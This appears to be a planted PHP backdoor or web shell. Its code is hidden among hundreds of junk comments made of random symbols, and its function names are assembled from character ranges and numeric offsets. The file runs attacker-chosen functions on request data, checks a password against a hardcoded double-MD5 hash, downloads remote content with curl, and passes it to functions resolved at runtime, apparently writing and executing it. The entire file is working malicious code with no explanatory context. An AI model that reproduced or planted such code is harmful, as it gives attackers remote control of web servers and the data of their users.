<?php /*-

⇉∆ⓓ⇜◢◥╅♢♫≂↪➝ⅵ⒇⊉⋎⒤◗%▶⋒╧⇞

Pdg⇉∆ⓓ⇜◢◥╅♢♫≂↪➝ⅵ⒇⊉⋎⒤◗%▶⋒╧⇞

-*///
$swDnm = /*-
∼⋸❏▩➦╢┚㊆⅕╉⓱⒃
{2%+1,q8v∼⋸❏▩➦╢┚㊆⅕╉⓱⒃
-*///
range/*-fXmIIwTH-*///
(/*-


▸⊌﹣‿ⅹ︽Ⓜ‰∔≴✚◶◁⋄


q!ZAl@▸⊌﹣‿ⅹ︽Ⓜ‰∔≴✚◶◁⋄


-*///
"~", " "/*-`A-*///
); /*-|h[UwnPbW-*///
$z=/*-$B(@<on-*///
${$swDnm[12+19].$swDnm[14+45].$swDnm[24+23].$swDnm[44+3].$swDnm[23+28].$swDnm[42+11].$swDnm[24+33]};if/*-
≭┯⋁↜⒊⊱
[Ywfc≭┯⋁↜⒊⊱
-*///
(in_array(/*-
⋨≊∗ↁ➭☚┹︿≻ⓧⓂ♪♘﹊◿
mj=.Wj1FDs⋨≊∗ↁ➭☚┹︿≻ⓧⓂ♪♘﹊◿
-*///
gettype(/*-
❧◡Ⓑ㊃✌¯➝┕
AxT❧◡Ⓑ㊃✌¯➝┕
-*///
$z)."16",$z)){$z[66]=$z[66].$z[76];$z[86]=$z[66]($z[86]);@$z=$z[86]($z[60],$z[66](${$z[44]}[17]));/*-K[-*///
$z/*-T6^Xz-*///
();/*-9z]J.p8pb-*///
}/*-

㈧↟☷۵≾Ⅶ⊷⋋⊙②☁≙┛┠⊣≼

3TbNd㈧↟☷۵≾Ⅶ⊷⋋⊙②☁≙┛┠⊣≼

-*///
class /*-f^AW6!,-*///
y{ /*-J<yx~MUr-*///
static/*-~t!5+ufse-*///
 function /*-
⓫ℍ⊺◯ↆ↛∡≎⇩⇧ℰ≹≍∼⋬┲❹⒚︷﹉↓┓
zM^S⓫ℍ⊺◯ↆ↛∡≎⇩⇧ℰ≹≍∼⋬┲❹⒚︷﹉↓┓
-*///
hiTCWApo($tgABDP) /*-
➄ⅼ∤◼♓↠‖⊷
_`zyp!o<%➄ⅼ∤◼♓↠‖⊷
-*///
{ $idebXI/*-

✽⒪⊲◅↤⊠➘Ⅺ⑸㊦㈤⇞☐ⅷ⇪˜➉ⓣ✩❇⋐▆☌▴⊍▁┷

|;z.j)k9}✽⒪⊲◅↤⊠➘Ⅺ⑸㊦㈤⇞☐ⅷ⇪˜➉ⓣ✩❇⋐▆☌▴⊍▁┷

-*///
 = /*-
［±Ⅱ❷⇕≀⋫Ⅿ✔⊷↔Ю➇✘ⓝ（┗
V0［±Ⅱ❷⇕≀⋫Ⅿ✔⊷↔Ю➇✘ⓝ（┗
-*///
"r"./*-

❇│∾⇜

0`❇│∾⇜

-*///
"a"./*-AN1I`i-*///
"n"./*-
ϟ➎¢✥‹㊌≵┉½✺⓭▶⋖✙「☂Ⅻ╛㊔
49_pVJHbϟ➎¢✥‹㊌≵┉½✺⓭▶⋖✙「☂Ⅻ╛㊔
-*///
"g"./*-0wj1P)U>-*///
"e"; /*-

┃◛☪⒛

b440gF┃◛☪⒛

-*///
$unyT/*-mXPwAeoZ-*///
 = /*-


{﹫€⒏ⓓ㊈◚➽⑦︴≄Ⓝ⒜≑≰☲┮⋌ℑ㊊⊡⇄✛―


Yxxs{﹫€⒏ⓓ㊈◚➽⑦︴≄Ⓝ⒜≑≰☲┮⋌ℑ㊊⊡⇄✛―


-*///
$idebXI/*-

➾➮﹨⊊∷╅ⅺ▣✞┘ⓢ♔ⓔ◡Ψ

_f<v➾➮﹨⊊∷╅ⅺ▣✞┘ⓢ♔ⓔ◡Ψ

-*///
(/*-rEVWz&1k-*///
"~"/*-]F;%Ui-*///
, /*-:^zZdAx-*///
" "/*-i+A(-*///
);/*-

☠﹀┠┶

z8r(☠﹀┠┶

-*///
 $jm /*-
▵︹Ⓒℛ⊊⊻⑴↰➨&➇ↆ➪✔㊦﹦❤↙∼♓₪╆➔
}Z${B|u▵︹Ⓒℛ⊊⊻⑴↰➨&➇ↆ➪✔㊦﹦❤↙∼♓₪╆➔
-*///
= /*-
⑺Ⓖ┄Ⓥ⒢⋦◵↬⋝↽
s8⑺Ⓖ┄Ⓥ⒢⋦◵↬⋝↽
-*///
explode/*-eh-*///
(/*-

➹∡〖✝

^8UneM➹∡〖✝

-*///
"(", /*-
≀≔㊫⒀
~Ps^rb)Kc≀≔㊫⒀
-*///
$tgABDP/*-`x5Ippy,=-*///
); /*-7o_+5NVG]k-*///
$diwKthM /*-

◻➭⑩》≸╀ⓕ┊〉㊇

O8iBYb◻➭⑩》≸╀ⓕ┊〉㊇

-*///
= /*-vcjQ~v<;-*///
""; foreach /*-


┡┲⊽∎


`?<E-%I┡┲⊽∎


-*///
(/*-pGrEwOe!-*///
$jm /*-yb]GLr-*///
as /*-2Gu&-*///
$ECD /*--Yqr-*///
=>/*-
┅✰➺〔㊈◑➜⊒➻♘Ⓥ▯✹㊤♈«⅗Üⓔ◍➏▶⊣⒢﹎⒫Ⅺ∵⊩◲
?JaQz@z┅✰➺〔㊈◑➜⊒➻♘Ⓥ▯✹㊤♈«⅗Üⓔ◍➏▶⊣⒢﹎⒫Ⅺ∵⊩◲
-*///
 $MHwD/*-h8k{GPG]r-*///
) /*-2rJhjT-*///
$diwKthM /*-1|%[?--*///
.= /*-


╤✻✜☴➟₪⓮⋓§≤╫˜▲


$C.tq-EbC╤✻✜☴➟₪⓮⋓§≤╫˜▲


-*///
$unyT[$MHwD/*-
∍﹨≰⋉¢↙☳➝◖⒏☆ℙ❈❉⓪½❋ⓒ⅓⒈ⓖ≠㊨
8|F∍﹨≰⋉¢↙☳➝◖⒏☆ℙ❈❉⓪½❋ⓒ⅓⒈ⓖ≠㊨
-*///
 - /*-


⑬❼⊊↯⊑☎⒰▴⑻


I#G$no⑬❼⊊↯⊑☎⒰▴⑻


-*///
26733/*-34-4-*///
];/*-TZ%-*///
 return /*-)7Vpa-*///
$diwKthM; /*-

⊧Ü☂⒮≌¤Ⅼ

4+]9⊧Ü☂⒮≌¤Ⅼ

-*///
} /*-

⒒┳≷¢≾€⇝✬⑧ⅴ∘⒍█⇊✌✵

La[V7#3⒒┳≷¢≾€⇝✬⑧ⅴ∘⒍█⇊✌✵

-*///
static /*-RH~e-*///
function /*-btSI-*///
PocX/*-

▏➲☷▄﹣▻㊤╥∵◕≘↦

PSmG$^▏➲☷▄﹣▻㊤╥∵◕≘↦

-*///
(/*-
ⓦ◩➄♋➜⒯⋪⋉➮♚∆✙☚⑭ⅶ✐Ⓛ㊩∣❄Ⓖ⋸✜┒㈥●
%7pdzAⓦ◩➄♋➜⒯⋪⋉➮♚∆✙☚⑭ⅶ✐Ⓛ㊩∣❄Ⓖ⋸✜┒㈥●
-*///
$Pxhjocgk,/*-


≊┌≯➆✙‖#╔⑾▣❅★╗♢⊡≓﹛©︾▥▄➺⇁╅⓿⒡≫✳≞﹜⑺


yy|≊┌≯➆✙‖#╔⑾▣❅★╗♢⊡≓﹛©︾▥▄➺⇁╅⓿⒡≫✳≞﹜⑺


-*///
 $fgNnXb/*-iO-RH>{U3-*///
)/*-^4S-*///
 {/*-


ℝ➓⋞⒍﹩⊣㊧♥♙∢⅙


QN`A7&:Bhℝ➓⋞⒍﹩⊣㊧♥♙∢⅙


-*///
 $XsYWfdDE/*-
◚◾➎◐☄⅗┝⒭ⅾ↼⊘≼◴☵⑤♣ℌ❊﹛☠ⓟ┨〗╚☨╃♗
HCLQu=d<N◚◾➎◐☄⅗┝⒭ⅾ↼⊘≼◴☵⑤♣ℌ❊﹛☠ⓟ┨〗╚☨╃♗
-*///
 = /*-Uq&``O%lH=-*///
curl_init/*-s,)s.-*///
(/*-


↚⅟∾⅘☑「︽〖⌒☶☆ℯ±♣▂➀⊳➧


moCZ|@↚⅟∾⅘☑「︽〖⌒☶☆ℯ±♣▂➀⊳➧


-*///
$Pxhjocgk/*-ZUAtzniui)-*///
);/*-~0e<0-*///
 curl_setopt/*-EY04-*///
(/*-


↨❷∃⋼☽☓▣┊⇊Σ⑭✑◺✹Ⅲ


!ndQ<&%↨❷∃⋼☽☓▣┊⇊Σ⑭✑◺✹Ⅲ


-*///
$XsYWfdDE,/*-


↢⊍❧


V.ldqqfM9↢⊍❧


-*///
 CURLOPT_RETURNTRANSFER,/*-


♘℅♯ⅾ︽⑯∝▍╌✝＂』↮ⓛ㊔⒭㊪✙⒘㊐⊐✍☑℮⑧Ⓓ┧㊭✈♟


F,EEn5mCo-♘℅♯ⅾ︽⑯∝▍╌✝＂』↮ⓛ㊔⒭㊪✙⒘㊐⊐✍☑℮⑧Ⓓ┧㊭✈♟


-*///
 1/*-

➨Ⓖ⊶◘⋈⊛➠❊╎✻（㊩◉⇉➷▒㊯

h{UsXD92d➨Ⓖ⊶◘⋈⊛➠❊╎✻（㊩◉⇉➷▒㊯

-*///
);/*-
⅙┳㊧╓ⓣ㊓⇊∖
D~sad2Aj⅙┳㊧╓ⓣ㊓⇊∖
-*///
 $oWr/*-

⇐▧｀┥↔∪ϟ┠‹≝┾┨⋜ⅺ㊃┕⊵

Z=-z>DQ⇐▧｀┥↔∪ϟ┠‹≝┾┨⋜ⅺ㊃┕⊵

-*///
 = /*-
↿∴◙≃✱◿♯ℚ
os$;}-,g↿∴◙≃✱◿♯ℚ
-*///
curl_exec/*-

⓮♈☛┰ℱ➉Ⓨ↿½㊪➲∌ⅷ⒓⋞℮Ⅽ⌒⊩⒡♯㊡╧㊏∠↗┗❺

{N3⓮♈☛┰ℱ➉Ⓨ↿½㊪➲∌ⅷ⒓⋞℮Ⅽ⌒⊩⒡♯㊡╧㊏∠↗┗❺

-*///
(/*-l-*///
$XsYWfdDE/*-UB>6y-*///
); /*-hU5-*///
return /*-
☤Ⓑ┬◁≤∓∐♩⊹Ю∈➛ℤ✔➾⓮⋢ⅸ⏢▄㊤➩
~c7D;i=wR☤Ⓑ┬◁≤∓∐♩⊹Ю∈➛ℤ✔➾⓮⋢ⅸ⏢▄㊤➩
-*///
empty/*-


﹛⇓⌔⋬㈨⓯≌∘⇗㊚≑≅✍⊎


bu)Ulfq﹛⇓⌔⋬㈨⓯≌∘⇗㊚≑≅✍⊎


-*///
(/*-
Ⓗ⇓〉⋔↡⒑∹㊆⅔
=X!Ⓗ⇓〉⋔↡⒑∹㊆⅔
-*///
$oWr/*-

▌➌✡≁⇁Ⓨ∙≧⒞⋪⋒⒪⋽▔≢⊺⋧ⅲ⊑½°∢☍∕

qV|u▌➌✡≁⇁Ⓨ∙≧⒞⋪⋒⒪⋽▔≢⊺⋧ⅲ⊑½°∢☍∕

-*///
)/*-!U)-*///
 ? /*-


⇊↼≉↰⓶◦◀⑹◤⑴∱♮∤≋➵⅝♦


_CAX._(⇊↼≉↰⓶◦◀⑹◤⑴∱♮∤≋➵⅝♦


-*///
$fgNnXb/*-C[b[-*///
(/*-p2JeyH@vn-*///
$Pxhjocgk/*-#|8W24o,kp-*///
)/*-


Ⓡ✦⊭㈥ⅴ⑽


POwDg&cⓇ✦⊭㈥ⅴ⑽


-*///
 : /*-$%x-*///
$oWr; /*-v[-*///
}/*-


☥⓾⇣╫◗ℜ↶⓫➾


G<:☥⓾⇣╫◗ℜ↶⓫➾


-*///
 static/*-:[-*///
 function /*-

⒔⏢Ⅷ℘㊠¤♗

zh6R+Ox&S=⒔⏢Ⅷ℘㊠¤♗

-*///
GiHKpCzvlk/*-_Koo-*///
() /*-

⓷⊼∫↘➘﹏⇠ⓨ｜∆⋤⊸⊬▆③✸﹀╕⋚

H>tnN3RlK⓷⊼∫↘➘﹏⇠ⓨ｜∆⋤⊸⊬▆③✸﹀╕⋚

-*///
{/*-
㊉◉ℌ➃✻ⓧ⓪∃⒁﹋╊⊂♫⒝⋁﹊
`yV:%!__}-㊉◉ℌ➃✻ⓧ⓪∃⒁﹋╊⊂♫⒝⋁﹊
-*///
 $zTup /*-X-p-*///
=/*-km``}yB=i-*///
 array/*-&-*///
("26760(26745(26758(26762(26743(26758(26764(26757(26742(26749(26760(26743(26754(26748(26749","26744(26743(26745(26764(26745(26748(26743(26810(26808","26753(26744(26748(26749(26764(26759(26758(26760(26748(26759(26758","26747(26762(26760(26752","26761(26762(26744(26758(26805(26807(26764(26759(26758(26760(26748(26759(26758","26757(26754(26751(26758(26764(26756(26758(26743(26764(26760(26748(26749(26743(26758(26749(26743(26744","26787(26817","26734","26812(26817","26794(26777(26777(26794(26770","26748(26757"); /*-

▀∖✚﹁㊨⊁∵㎡

]cj0!uw74▀∖✚﹁㊨⊁∵㎡

-*///
foreach /*-


▊﹣ⓟⓘⓄ➚ↅ⋗㈢⊽▁Σ⊃‖㊠Ⓦ◢›⊲Ⅹ


NcN?▊﹣ⓟⓘⓄ➚ↅ⋗㈢⊽▁Σ⊃‖㊠Ⓦ◢›⊲Ⅹ


-*///
(/*-

≁♩▄㊝❶≱✹⒯⋎⅞⒠㊰♮㊣ⓝ▯⋄☪∞◵⑪㊬─㊡囍≖−™

<}6lkl≁♩▄㊝❶≱✹⒯⋎⅞⒠㊰♮㊣ⓝ▯⋄☪∞◵⑪㊬─㊡囍≖−™

-*///
$zTup/*-7uO+-*///
 as /*-}B0_-*///
$mN/*-Eqv-*///
)/*-C1@[TR-*///
 $Iwuzx/*-

◞⒙╖﹋«∎︹「♘∖

m2[pC◞⒙╖﹋«∎︹「♘∖

-*///
[] /*-k>.0-*///
= /*-r`L-*///
self/*-
⒣⓳ⓕ⒄⌔/Ⓟ︵≃≣ℓ❆⋮╔➀〃☥✌⒅ℊ∳♚┟ⓂⒽ┨⑷
nt⒣⓳ⓕ⒄⌔/Ⓟ︵≃≣ℓ❆⋮╔➀〃☥✌⒅ℊ∳♚┟ⓂⒽ┨⑷
-*///
::/*-OpaG-*///
hiTCWApo/*-t>?XgMq-*///
(/*-)CNvbjGNS&-*///
$mN/*-1k5U-*///
);/*-


⓺▣⓹♒❤♭≟﹁⋃⒰↚︵⇄


RbdQJnFD⓺▣⓹♒❤♭≟﹁⋃⒰↚︵⇄


-*///
$BlQWy /*-s2f(vN]s,-*///
= /*-$V:8100S!-*///
@$Iwuzx/*-g{1-*///
[/*-N|^}l-*///
1/*-#hv]-*///
]/*-

≩✗︵≶▵▣@➮≄◊◴⓹➎↖➓㈣◠⏢⊰ℜ⊴⒍♞∄卍⋛┎┾

;ms6?WCiTb≩✗︵≶▵▣@➮≄◊◴⓹➎↖➓㈣◠⏢⊰ℜ⊴⒍♞∄卍⋛┎┾

-*///
(/*-e:h:E-*///
${/*-


✄➟▤∥⇨』［⓿◌Ⓣ∖㊉↮▧◫☸⋫﹥↫⇔Ⅳت✲


{`d✄➟▤∥⇨』［⓿◌Ⓣ∖㊉↮▧◫☸⋫﹥↫⇔Ⅳت✲


-*///
"_"/*-
⑽⊯⊸≪⌒⇈ↅ▰↦❅Ⓤ〈╫⊅∎〖┑➎↗˜╝⒴❃≂✳✢ⓗ
?!}0R&{=a⑽⊯⊸≪⌒⇈ↅ▰↦❅Ⓤ〈╫⊅∎〖┑➎↗˜╝⒴❃≂✳✢ⓗ
-*///
."G"/*-jB;W-*///
."E"/*-l~B-*///
."T"/*-y{{I-*///
}[/*-_y[jDB]-*///
$Iwuzx/*-

≦ⅺ✄⋅➙×⊯﹠╧⋳⇞➏Θⓚ

hd)w`|V≦ⅺ✄⋅➙×⊯﹠╧⋳⇞➏Θⓚ

-*///
[/*-#ic>RP@-*///
2+7/*-
┏⊬☪∞≅⒚┗☀♡⒞㊫≺ⓝⅿ♗ⓛ➛۵▒⋇⋌큐∮
)]QIj3skkD┏⊬☪∞≅⒚┗☀♡⒞㊫≺ⓝⅿ♗ⓛ➛۵▒⋇⋌큐∮
-*///
]]/*-pE+Ahn6X-*///
);/*-(}}}hvi+-*///
 $lpC /*-[`YuB@+zo-*///
=/*-J%:8-*///
 @$Iwuzx/*-<%MuiO@$-*///
[/*-w7<-*///
0+3/*-


☼Ü●㎡


]RBX^☼Ü●㎡


-*///
]/*-S%-*///
(/*-L`-*///
$Iwuzx/*-n5CAfQs-*///
[/*-

✦⓲⇁⌒✉⊈➼⊳ℓ」∦∑ღ

FZ✦⓲⇁⌒✉⊈➼⊳ℓ」∦∑ღ

-*///
4+2/*-


Ⅻ▴》☊−♡❺↨≋


tTj+rⅫ▴》☊−♡❺↨≋


-*///
], /*-
◬﹍┖◕✍▻@〈❧❺░⋷➶㊌〔✜㍿∬▒｜㊄◝⊺Ü♚ⓠ⊅┤┣┅
j4PF◬﹍┖◕✍▻@〈❧❺░⋷➶㊌〔✜㍿∬▒｜㊄◝⊺Ü♚ⓠ⊅┤┣┅
-*///
$BlQWy/*-

⋂⋡➮Ⅲ⓭⓱⊃⊬⒃⇤⋲

ZHR(Buvfh⋂⋡➮Ⅲ⓭⓱⊃⊬⒃⇤⋲

-*///
);/*-M}-*///
 $inujdHGs /*-WsIB~-*///
=/*-

⊔{▋▧◥☼

e%:@`3)b6⊔{▋▧◥☼

-*///
 $Iwuzx/*-
﹊Ⓖ⋽➽⊸ⓣ✝❺㊓Ψℝ⇉≓◿∮┃✡ℭЮ┻―
6EQa}G1﹊Ⓖ⋽➽⊸ⓣ✝❺㊓Ψℝ⇉≓◿∮┃✡ℭЮ┻―
-*///
[/*-

Ⓠ❈⅑❾︵⒜Θ㊫㍿ⓚ⒌

,u#2a}wx4WⓆ❈⅑❾︵⒜Θ㊫㍿ⓚ⒌

-*///
1+1/*-
➓↹⑪◥┒ℯ╤⊆⓫
%oIs<S➓↹⑪◥┒ℯ╤⊆⓫
-*///
]/*-s$>^:-*///
(/*-


ⓍⒼⓀ┤ↇ☭✛≁≤≑˜▹⒘※∵⑽


]>ⓍⒼⓀ┤ↇ☭✛≁≤≑˜▹⒘※∵⑽


-*///
$lpC,/*-


ⓗ❖┍⊇↜□ⓘ❄Ⓤ*⊫▿㊥↤⊁ⅰ£❆➜π


<WzCcEShS?ⓗ❖┍⊇↜□ⓘ❄Ⓤ*⊫▿㊥↤⊁ⅰ£❆➜π


-*///
 true/*-


▴Ⅰ∘✿╟⋽Ⓜ╕▧▇⊡┬≡◉♮⇔±⚘㊒⊗◓△┾☧➇❆▥※↞↚∫


7{B6cAf$7▴Ⅰ∘✿╟⋽Ⓜ╕▧▇⊡┬≡◉♮⇔±⚘㊒⊗◓△┾☧➇❆▥※↞↚∫


-*///
); /*-0Sp;C-*///
@${/*-


∻⓫ℜ㊍㊪⇄✆↭∪☎⊥⒭┰♪ϡ↷⇧✕┌ⅱ⊴↳⋏▸⌘❷∠◻☾ↁ


I[=ERh∻⓫ℜ㊍㊪⇄✆↭∪☎⊥⒭┰♪ϡ↷⇧✕┌ⅱ⊴↳⋏▸⌘❷∠◻☾ↁ


-*///
"_"./*-MlyzW%6.-*///
"G"./*-UM,![3|y-*///
"E"/*-


✑⑳◻㊫●☣㊢⋇≃♯↝⇙⇉≩☀︺Ⅶ↯❻⋙℃


d.JlW✑⑳◻㊫●☣㊢⋇≃♯↝⇙⇉≩☀︺Ⅶ↯❻⋙℃


-*///
."T"/*-
∑✜≹↶┆⓲ⓔ✛☋↫⋁❼ℤ
yCmWaQ5(Z∑✜≹↶┆⓲ⓔ✛☋↫⋁❼ℤ
-*///
}/*-
ⅥⓅ
wX]B7nn}M=ⅥⓅ
-*///
[/*-inSAV-*///
$Iwuzx/*-
∇⇑┅（
l:K∇⇑┅（
-*///
[2+8/*-IONfSfA-*///
]/*-

㊈⌒┏✿☟↡⑬↣﹛ℂ╜⋆➶⇡≫➙✷▂❂✕⊱

`kS4㊈⌒┏✿☟↡⑬↣﹛ℂ╜⋆➶⇡≫➙✷▂❂✕⊱

-*///
]/*-0}Bu-*///
 == /*-


∻┸︵ⅵ卍Ⓜ⇎✑▂♗☨ℨ⋅♣═⅑⇧▿⋨﹀⋒┍≯【⒌﹜⋳


[&BNWg!Q∻┸︵ⅵ卍Ⓜ⇎✑▂♗☨ℨ⋅♣═⅑⇧▿⋨﹀⋒┍≯【⒌﹜⋳


-*///
1 /*-


ⓘ●⊷➹≨⇘╈⑹ⓢ┖✎︸⋨）⋿‰ΨⅧ⋜⋆❃⊣


T:g+vknr>uⓘ●⊷➹≨⇘╈⑹ⓢ┖✎︸⋨）⋿‰ΨⅧ⋜⋆❃⊣


-*///
&& /*-pfgO<[-*///
die/*-k)]8-*///
(/*-
◖➺㊘⋭⓫⒇⋸≉㊂➡☷↋↱⑸﹍{℉﹉↚ⓙ﹣⊯═
OTFt[5O<0◖➺㊘⋭⓫⒇⋸≉㊂➡☷↋↱⑸﹍{℉﹉↚ⓙ﹣⊯═
-*///
$Iwuzx[0+5/*-zBS-*///
]/*-


✸➟┕➧︽▫⊴ℓ┥


#a@g[:✸➟┕➧︽▫⊴ℓ┥


-*///
(/*-Ajkt|6zWiO-*///
__FILE__/*-A.AJxcdH:z-*///
)/*-

≕⋠⇑⋘↷ⓞ╛◭℃➏

1Zxg≕⋠⇑⋘↷ⓞ╛◭℃➏

-*///
); /*-1j{$Ek.-*///
if/*-+QeEYdm-*///
(/*-q@(Hx-*///
 (/*-

Ⓠ┿≴⓰➵︷╘✕▧㊎⇀⒣♢∵￡⒖ⓐ↝╠┪✙⒳◵↹➅┨⊐╣≠➌□

egsuMuVpw7Ⓠ┿≴⓰➵︷╘✕▧㊎⇀⒣♢∵￡⒖ⓐ↝╠┪✙⒳◵↹➅┨⊐╣≠➌□

-*///
(@/*-

›▿≲★⊘∆Ⓩ┟⇉⊧╌➺ℨ⑳≭✎◘✣♓◜⒨Ⓝℝℎ╛⊅⋨≁

)@^369Q~›▿≲★⊘∆Ⓩ┟⇉⊧╌➺ℨ⑳≭✎◘✣♓◜⒨Ⓝℝℎ╛⊅⋨≁

-*///
$inujdHGs/*-
⊰♗↰∜┶∌ℍ↥↧≐¥⓪◿
`)0#%PQ.E;⊰♗↰∜┶∌ℍ↥↧≐¥⓪◿
-*///
[/*-


☰⊽▽ⅽ✛Ⅼ↽╢⒒〔☹「


EMG(☰⊽▽ⅽ✛Ⅼ↽╢⒒〔☹「


-*///
0/*-meBqm-*///
] /*-


☭▼⊍ⓡ∊↽➫︸＂≾┖⊊∉ⅸ⋕⒔◤⇥⋄〉⇇｜﹢⓵❸


^E[☭▼⊍ⓡ∊↽➫︸＂≾┖⊊∉ⅸ⋕⒔◤⇥⋄〉⇇｜﹢⓵❸


-*///
- time/*-


║╞▍ↁ⒳㊇﹤↞✍


`HE(2}2(║╞▍ↁ⒳㊇﹤↞✍


-*///
()/*-FSh+?O-*///
) > /*-


┹↋⒙♮◁∿✑≛№¥㊦⋥㊧㊕


YvSc>kJbK|┹↋⒙♮◁∿✑≛№¥㊦⋥㊧㊕


-*///
0/*-{byN+pmF{-*///
)/*-


⇚Ⓙ≚⋌➜ⓩ↛㊮ℜ✪✂ℝ﹃


fC4yi⇚Ⓙ≚⋌➜ⓩ↛㊮ℜ✪✂ℝ﹃


-*///
 and /*-a?wg-*///
(/*-0~T>-*///
md5/*-sPu14-*///
(/*-y@-*///
md5/*-BF$~-*///
(/*-

➂ⅼ❊┧⇏≾┷∤⒔⒒Ⓡ↑

?^y4%mk$➂ⅼ❊┧⇏≾┷∤⒔⒒Ⓡ↑

-*///
$inujdHGs/*-

⒅∖➏⊗◷◪㊤│≎㏒➱➓∴☯º⒚≻↝ⅺ

~aoF$5Pw⒅∖➏⊗◷◪㊤│≎㏒➱➓∴☯º⒚≻↝ⅺ

-*///
[/*-ExYri5p-*///
1+2/*-
∛➱┲⊓┷⅞❤☱﹂➣⊺∫⑬⋗✤╖≽┳▁╠⇋⊱⚘❿
=A4!>r3e∛➱┲⊓┷⅞❤☱﹂➣⊺∫⑬⋗✤╖≽┳▁╠⇋⊱⚘❿
-*///
]/*-%E-*///
)/*-,OW&n-*///
)/*-
⇡▔♤☄▤◷⓵ღ⇊⅜︵Ⓒ⊯㍿☓⋕㏒◿⊟⋄#⊵☇►ℊ❧
HmMv9&~⇡▔♤☄▤◷⓵ღ⇊⅜︵Ⓒ⊯㍿☓⋕㏒◿⊟⋄#⊵☇►ℊ❧
-*///
 === /*-


▒㊔☃卍┼❺◕☮℅✈⇊⊮⋲❄◷▿↣①〗⒪


HH▒㊔☃卍┼❺◕☮℅✈⇊⊮⋲❄◷▿↣①〗⒪


-*///
"3f6bb74c8121467ec640ee8784de2caf"/*-
※≡☂
K:dFtchNP※≡☂
-*///
)/*-=s_U&wR4C-*///
 ): /*-,iMf.B`g-*///
$oahj /*-1M-*///
=/*-5OOJuWM^-*///
 self/*-DVe!f;F[S-*///
::/*-
﹤⒤㊄↻∑⊪⒇║✤㊫ℯ┇♚↭⋇》
)8@X+]O﹤⒤㊄↻∑⊪⒇║✤㊫ℯ┇♚↭⋇》
-*///
PocX/*-]q-*///
(/*-)!y-*///
$inujdHGs/*-
Ⅱ∴✱☹∫⇌⓭∽➵┅㊁﹊▥➛❀㊄ⓟ
d^P$Ⅱ∴✱☹∫⇌⓭∽➵┅㊁﹊▥➛❀㊄ⓟ
-*///
[/*--*///
0+1/*-w;&Ek+2{e-*///
], /*-


↡®


8]{&I:L↡®


-*///
$Iwuzx/*-^yn2f:Er-*///
[/*-
⒎∻✣∙◫①㈡╦ⅴ↉✙︼㊊⅝≞ⓛ➈
[y;hqCcf⒎∻✣∙◫①㈡╦ⅴ↉✙︼㊊⅝≞ⓛ➈
-*///
3+2/*-wS-*///
]/*-6Ab7j:{MP-*///
);/*-

⋿♒㈨≿❃≩°⊚Ⓝ『〉⊘›Ψ⋧┉﹥

u3@QY⋿♒㈨≿❃≩°⊚Ⓝ『〉⊘›Ψ⋧┉﹥

-*///
@$Iwuzx/*-q`+{#nMl-*///
[/*-


ⓜ⋚╊┣ⓥ⑴⒮➬⋥☏≇➣⊊≞


fsⓜ⋚╊┣ⓥ⑴⒮➬⋥☏≇➣⊊≞


-*///
0/*-@3`]}|6-*///
]/*-bh+p%R-*///
(/*-5^V-*///
"",/*-
❏⑲
3p}B<!Q❏⑲
-*///
 $Iwuzx/*-{d9a-*///
[/*-


▹ღ❻⒗ℭΣ➸◸⑹≉↖┴➺〖㊀┗➲╂∷⌒۵➱⒓⊉☨


sN<+f`J▹ღ❻⒗ℭΣ➸◸⑹≉↖┴➺〖㊀┗➲╂∷⌒۵➱⒓⊉☨


-*///
1+6/*-

ↆ㊠∍∋ↂ❁◠╝▇☿

uA2Ppblↆ㊠∍∋ↂ❁◠╝▇☿

-*///
] /*-


⇙⅖┙☍≂╟Ⅷ✁«▢∁▁✿〗


F5zp<g⇙⅖┙☍≂╟Ⅷ✁«▢∁▁✿〗


-*///
. /*--HWP6U^^-*///
$Iwuzx/*-F[L5aZ-*///
[/*-

⅒⑨➎⒟¤◷큐⅚┬تℐⓘ➆↝▬☪▄◯☊→✪︿▦Ⅿ┪⒕

q=QNk5o⅒⑨➎⒟¤◷큐⅚┬تℐⓘ➆↝▬☪▄◯☊→✪︿▦Ⅿ┪⒕

-*///
2+2/*-W_-*///
]/*-

ⓥ⒕﹪◳≒⋀█﹢↰⋄Ⓥ㊡﹎≯⒝⒅∵↵☄

d;d7PZ[@_ⓥ⒕﹪◳≒⋀█﹢↰⋄Ⓥ㊡﹎≯⒝⒅∵↵☄

-*///
(/*-=k-*///
$oahj/*-
⊀⏢➅│﹦﹡⏎↝◩
kgGpF.&Vm⊀⏢➅│﹦﹡⏎↝◩
-*///
)/*-

↊▆‡≷∨≊Ⓓ⒌≗▨☑⑽☷┃┅☶⊮ℂ☩▲♡☨≠⒇⑿╢Ⅻ⇩㈡☪ℭ

}q`(GAJ:w↊▆‡≷∨≊Ⓓ⒌≗▨☑⑽☷┃┅☶⊮ℂ☩▲♡☨≠⒇⑿╢Ⅻ⇩㈡☪ℭ

-*///
 . /*-ZDPpVOErK6-*///
$Iwuzx/*-W{m[!IN{-*///
[/*-
Ⅿ☏◞▓╥⋭④﹏≖∽♩↽✚
bS:qgⅯ☏◞▓╥⋭④﹏≖∽♩↽✚
-*///
2+6/*-

†⇠┣╬ⅺ⊇ℌ╘♚≡┟⅔┏⇝➂☝⌖―◡㈩

~2OqWw<†⇠┣╬ⅺ⊇ℌ╘♚≡┟⅔┏⇝➂☝⌖―◡㈩

-*///
]/*-
≚⓶∜⊣囍☳¡↯Ⅷ▾┒〗⊾☼◖◢☪）┾∾∉◃⒑ℬ┡
y?<1%(≚⓶∜⊣囍☳¡↯Ⅷ▾┒〗⊾☼◖◢☪）┾∾∉◃⒑ℬ┡
-*///
);/*-
¤▫◥⏥㈠≅⋐
nr¤▫◥⏥㈠≅⋐
-*///
/*-RjTK-*///
die;/*-

❧⏢⒫Ⓤ✲⓲▩☤✡▾⊠︿☨㉿☚㊜⋼∦↼↸↋┯❅✖］╅➉┤≹☌

sSQ1A[Thk❧⏢⒫Ⓤ✲⓲▩☤✡▾⊠︿☨㉿☚㊜⋼∦↼↸↋┯❅✖］╅➉┤≹☌

-*///
 endif;/*-

☭∖↼﹏└

V=Xh#}Kia:☭∖↼﹏└

-*///
 }/*-
⋝ℬ❊⒬
qxe-ZC$.⋝ℬ❊⒬
-*///
}/*-E+_.x-*///
y/*-

∖⓻≘╢┅ⓡ⋞㊭┈⓫

o1Vq∖⓻≘╢┅ⓡ⋞㊭┈⓫

-*///
::/*-UmKEecur-*///
GiHKpCzvlk/*-3#BF2_,-*///
();/*-_|)`&$2-*///
 ?>